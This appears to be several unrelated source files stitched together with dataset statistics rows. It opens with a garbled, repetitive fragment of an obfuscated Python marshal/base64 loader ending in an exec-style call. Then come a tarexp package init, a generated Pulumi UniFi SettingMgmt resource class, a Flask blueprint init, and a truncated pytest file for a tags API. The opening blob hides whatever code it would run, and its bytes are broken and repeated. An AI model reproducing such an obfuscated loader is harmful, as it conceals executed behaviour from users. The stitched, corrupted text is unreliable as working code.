\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x0
0\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\
x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00
\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\
x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02'));os.sys.exit()
asw() | 30,898.833333 | 185,304 | 0.760859 | 41,766 | 185,393 | 3.377221 | 0.007566 | 0.555834 | 0.449001 | 0.466803 | 0.98419 | 0.983141 | 0.982872 | 0.982872 | 0.982652 | 0.982652 | 0 | 0.429919 | 0.000237 | 185,393 | 6 | 185,305 | 30,898.833333 | 0.331094 | 0.000108 | 0 | 0 | 0 | 0.2 | 0.429178 | 0.428876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 18 |
9d85cf269962bdf3229d00317d0e3db8bc62f27e | 106 | py | Python | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | 13 | 2022-02-23T09:39:05.000Z | 2022-03-25T15:34:38.000Z | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | null | null | null | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | null | null | null | from tarexp.helper.pandas_tools import createDFfromResults
from tarexp.helper.plotting import cost_dynamic | 53 | 58 | 0.896226 | 14 | 106 | 6.642857 | 0.714286 | 0.215054 | 0.344086 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066038 | 106 | 2 | 59 | 53 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9d8feea124536cd75b504594b22783808e4433cd | 12,514 | py | Python | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2022-03-29T18:49:28.000Z | 2022-03-29T18:49:28.000Z | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SettingMgmtArgs', 'SettingMgmt']
@pulumi.input_type
class SettingMgmtArgs:
def __init__(__self__, *,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]] = None):
"""
The set of arguments for constructing a SettingMgmt resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]] ssh_keys: SSH key.
"""
if auto_upgrade is not None:
pulumi.set(__self__, "auto_upgrade", auto_upgrade)
if site is not None:
pulumi.set(__self__, "site", site)
if ssh_enabled is not None:
pulumi.set(__self__, "ssh_enabled", ssh_enabled)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@auto_upgrade.setter
def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_upgrade", value)
@property
@pulumi.getter
def site(self) -> Optional[pulumi.Input[str]]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@site.setter
def site(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "site", value)
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@ssh_enabled.setter
def ssh_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssh_enabled", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]):
pulumi.set(self, "ssh_keys", value)
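Each property above pairs a snake_case Python name with the provider's camelCase key via `@pulumi.getter(name=...)`. A minimal sketch of that naming convention (illustrative only, not Pulumi's actual implementation):

```python
def camel_case(name: str) -> str:
    # Map a snake_case property name to its camelCase wire name,
    # e.g. auto_upgrade -> autoUpgrade, ssh_keys -> sshKeys.
    head, *rest = name.split('_')
    return head + ''.join(part.title() for part in rest)

print(camel_case('auto_upgrade'))
print(camel_case('ssh_keys'))
```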
@pulumi.input_type
class _SettingMgmtState:
def __init__(__self__, *,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]] = None):
"""
Input properties used for looking up and filtering SettingMgmt resources.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]] ssh_keys: SSH key.
"""
if auto_upgrade is not None:
pulumi.set(__self__, "auto_upgrade", auto_upgrade)
if site is not None:
pulumi.set(__self__, "site", site)
if ssh_enabled is not None:
pulumi.set(__self__, "ssh_enabled", ssh_enabled)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@auto_upgrade.setter
def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_upgrade", value)
@property
@pulumi.getter
def site(self) -> Optional[pulumi.Input[str]]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@site.setter
def site(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "site", value)
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@ssh_enabled.setter
def ssh_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssh_enabled", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]):
pulumi.set(self, "ssh_keys", value)
class SettingMgmt(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None,
__props__=None):
"""
`SettingMgmt` manages settings for a unifi site.
## Example Usage
```python
import pulumi
import pulumiverse_unifi as unifi
example_site = unifi.Site("exampleSite", description="example")
example_setting_mgmt = unifi.SettingMgmt("exampleSettingMgmt",
site=example_site.name,
auto_upgrade=True)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]] ssh_keys: SSH key.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[SettingMgmtArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`SettingMgmt` manages settings for a unifi site.
## Example Usage
```python
import pulumi
import pulumiverse_unifi as unifi
example_site = unifi.Site("exampleSite", description="example")
example_setting_mgmt = unifi.SettingMgmt("exampleSettingMgmt",
site=example_site.name,
auto_upgrade=True)
```
:param str resource_name: The name of the resource.
:param SettingMgmtArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SettingMgmtArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
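The `__init__` above dispatches between the two overloads: a positional args object wins, otherwise plain keyword arguments are forwarded. A standalone sketch of that dispatch (the names here are hypothetical, not the real `_utilities` helper):

```python
class FakeArgs:
    # Stand-in for SettingMgmtArgs: a plain bag of resource properties.
    def __init__(self, auto_upgrade=None):
        self.auto_upgrade = auto_upgrade

def get_resource_args(*args, **kwargs):
    # A positional args object takes precedence over keyword arguments.
    if args and isinstance(args[0], FakeArgs):
        return args[0].__dict__
    return kwargs

print(get_resource_args(FakeArgs(auto_upgrade=True)))
print(get_resource_args(auto_upgrade=False))
```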
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.plugin_download_url is None:
opts.plugin_download_url = _utilities.get_plugin_download_url()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SettingMgmtArgs.__new__(SettingMgmtArgs)
__props__.__dict__["auto_upgrade"] = auto_upgrade
__props__.__dict__["site"] = site
__props__.__dict__["ssh_enabled"] = ssh_enabled
__props__.__dict__["ssh_keys"] = ssh_keys
super(SettingMgmt, __self__).__init__(
'unifi:index/settingMgmt:SettingMgmt',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None) -> 'SettingMgmt':
"""
Get an existing SettingMgmt resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]] ssh_keys: SSH key.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SettingMgmtState.__new__(_SettingMgmtState)
__props__.__dict__["auto_upgrade"] = auto_upgrade
__props__.__dict__["site"] = site
__props__.__dict__["ssh_enabled"] = ssh_enabled
__props__.__dict__["ssh_keys"] = ssh_keys
return SettingMgmt(resource_name, opts=opts, __props__=__props__)
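`get()` rebuilds state without running `__init__`: it allocates the state object with `__new__` and fills `__dict__` directly. The same Python mechanism in isolation (plain stdlib, no Pulumi):

```python
class State:
    def __init__(self):
        # Normal construction is never used during rehydration.
        raise RuntimeError('unused during rehydration')

state = State.__new__(State)          # allocate, skipping __init__
state.__dict__['auto_upgrade'] = True
state.__dict__['site'] = 'default'
print(state.auto_upgrade, state.site)
```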
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> pulumi.Output[Optional[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@property
@pulumi.getter
def site(self) -> pulumi.Output[str]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> pulumi.Output[Optional[Sequence['outputs.SettingMgmtSshKey']]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
# info/api/user/__init__.py (googleliyang/flask_house_rent, Apache-2.0)
from flask import Blueprint

user_blue = Blueprint('user_blue', __name__)

# Imported last so the user module can attach its routes to user_blue
# without a circular import.
from . import user
# plgx-esp-ui/tests/test_tag_endpoints.py (dhoomakethu/plgx-esp, MIT)
"""
All test cases require client, url_prefix and token,
which are passed as parameters to each test function.
"""
import json
from flask_restplus import marshal
from polylogyx.dao import tags_dao, packs_dao, hosts_dao, queries_dao
from polylogyx.models import Tag
from polylogyx.wrappers import tag_wrappers, query_wrappers, pack_wrappers
class TestTagsList:
    """
    For the test cases in this class all payload fields are optional:
    start and limit must be non-negative integers, and searchterm is a
    str (empty by default). If a value of the wrong type is passed,
    the endpoint returns 400, i.e. bad request.
    """
payload = {'start': None, "limit": None, "searchterm": ''}
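The assertions below all check the same JSON envelope; for reference, a sketch of a successful response in the empty-database case:

```python
# Shape of a successful /tags response asserted throughout this class
# (values shown for the empty-database case).
response = {
    'status': 'success',
    'data': {'count': 0, 'total_count': 0, 'results': []},
}
assert response['data']['count'] == len(response['data']['results'])
```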
def test_get_tag_list_without_payload(self, client, url_prefix, token):
"""
        Test-case without payload and without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_with_empty_payload(self, client, url_prefix, token):
"""
        Test-case with payload as an empty dictionary and
without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json={})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_with_payload(self, client, url_prefix, token):
"""
        Test-case with all payload values set (searchterm matches nothing)
        and without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "abc"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_invalid_method(self, client, url_prefix, token):
"""
